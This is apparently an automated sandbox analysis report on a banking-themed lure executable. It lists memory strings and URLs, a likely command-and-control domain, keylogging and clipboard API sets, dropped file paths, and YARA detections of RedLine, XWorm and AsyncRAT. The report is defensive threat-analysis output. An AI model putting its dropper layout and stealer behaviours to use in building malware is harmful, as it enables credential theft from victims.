Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response0
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9LR
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: build.exe, 0000000A.00000002.2549800111.0000000003211000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/x
Source: alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/
Source: alg.exe, 00000002.00000003.1322367769.00000000004C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/N
Source: alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280
Source: alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280LocationETagAuthentication-InfoAgeAccept-Ra
Source: alg.exe, 00000002.00000003.1328245615.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1322162088.00000000004E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/uhxgrttve?usid=25&utid=9755593280hv
Source: alg.exe, 00000002.00000003.1322367769.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1771772723.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1986704664.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1559227442.00000000004BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1340496189.00000000004BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz:80/uhxgrttve?usid=25&utid=9755593280PU
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: alg.exe, 00000002.00000003.1439852307.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: powershell.exe, 0000000E.00000002.1397307978.000001FEA60D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1539783861.000001DD84481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: alg.exe, 00000002.00000003.2038298699.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: alg.exe, 00000002.00000003.1550726071.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000002.00000003.1551610424.0000000001550000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.1551415000.0000000001550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: alg.exe, 00000002.00000003.2038429513.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: powershell.exe, 00000015.00000002.1539783861.000001DD846A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: alg.exe, 00000002.00000003.2038532715.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000002.00000003.2038532715.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000002.00000003.2038004148.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: powershell.exe, 0000000E.00000002.1437482472.000001FEB6143000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1614630556.000001DD944F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: alg.exe, 00000002.00000003.1347358368.00000000014D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Contains functionality to modify clipboard data

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Contains functionality to read the clipboard data

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00473F66

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0046001C

Potential key logger detected (key state polling based)

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0048CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e60d94.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.niellist.exe.4000000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.niellist.exe.4d10000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3eaebc0.8.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.3f45010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.3ef9df0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e57738.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e60d94.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3f45010.6.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 10.0.build.exe.ef0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 9.2.RegSvcs.exe.2e4e0f4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 11.0.XClient.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 9.2.RegSvcs.exe.3ef9df0.9.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 00000009.00000002.1304482234.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000011.00000002.1415424973.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.1302912222.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403B3A
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_20f5931f-3
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000002.1271710089.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_b2fc1c23-a
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_14cc24f3-2
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe, 00000000.00000003.1262264862.00000000041C3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e18844d4-5
Source: niellist.exe, 00000003.00000002.1291644202.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_b90dfd7b-4
Source: niellist.exe, 00000003.00000002.1291644202.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_574a7881-b
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_bd2db06b-0
Source: niellist.exe, 00000011.00000002.1407658535.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_e6f7d0dc-3

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0046A1EF

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00458310

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004651BD

Creates files inside the system directory

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8259331cca430bb.bin

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0040E6A0	0_2_0040E6A0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042D975	0_2_0042D975
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004221C5	0_2_004221C5
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004362D2	0_2_004362D2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004803DA	0_2_004803DA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0043242E	0_2_0043242E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004225FA	0_2_004225FA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0045E616	0_2_0045E616
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004166E1	0_2_004166E1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0043878F	0_2_0043878F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00436844	0_2_00436844
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00480857	0_2_00480857
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00418808	0_2_00418808
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00468889	0_2_00468889
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042CB21	0_2_0042CB21
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00436DB6	0_2_00436DB6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00416F9E	0_2_00416F9E
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00413030	0_2_00413030
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042F1D9	0_2_0042F1D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00423187	0_2_00423187
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00401287	0_2_00401287
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00421484	0_2_00421484
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00415520	0_2_00415520
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00427696	0_2_00427696
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00415760	0_2_00415760
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00421978	0_2_00421978
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0055BCC8	0_2_0055BCC8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0040FCE0	0_2_0040FCE0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00487DDB	0_2_00487DDB
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00421D90	0_2_00421D90
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0042BDA6	0_2_0042BDA6
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0040DF00	0_2_0040DF00
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00413FE0	0_2_00413FE0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B100D9	0_2_00B100D9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD6EAF	0_2_00AD6EAF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD51EE	0_2_00AD51EE
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B0D580	0_2_00B0D580
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B03780	0_2_00B03780
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B0C7F0	0_2_00B0C7F0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B139A3	0_2_00B139A3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00B05980	0_2_00B05980
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD7B71	0_2_00AD7B71
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00AD7F80	0_2_00AD7F80
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00D71360	0_2_00D71360
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AE39A3	3_2_00AE39A3
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AD5980	3_2_00AD5980
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA6EAF	3_2_00AA6EAF
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA51EE	3_2_00AA51EE
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00ADD580	3_2_00ADD580
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AA7F80	3_2_00AA7F80
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00AD3780	3_2_00AD3780
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00ADC7F0	3_2_00ADC7F0
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Code function: 3_2_00CEA410	3_2_00CEA410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02860FE0	9_2_02860FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_02861030	9_2_02861030
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_017DDC74	10_2_017DDC74
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 10_2_057EEE58	10_2_057EEE58
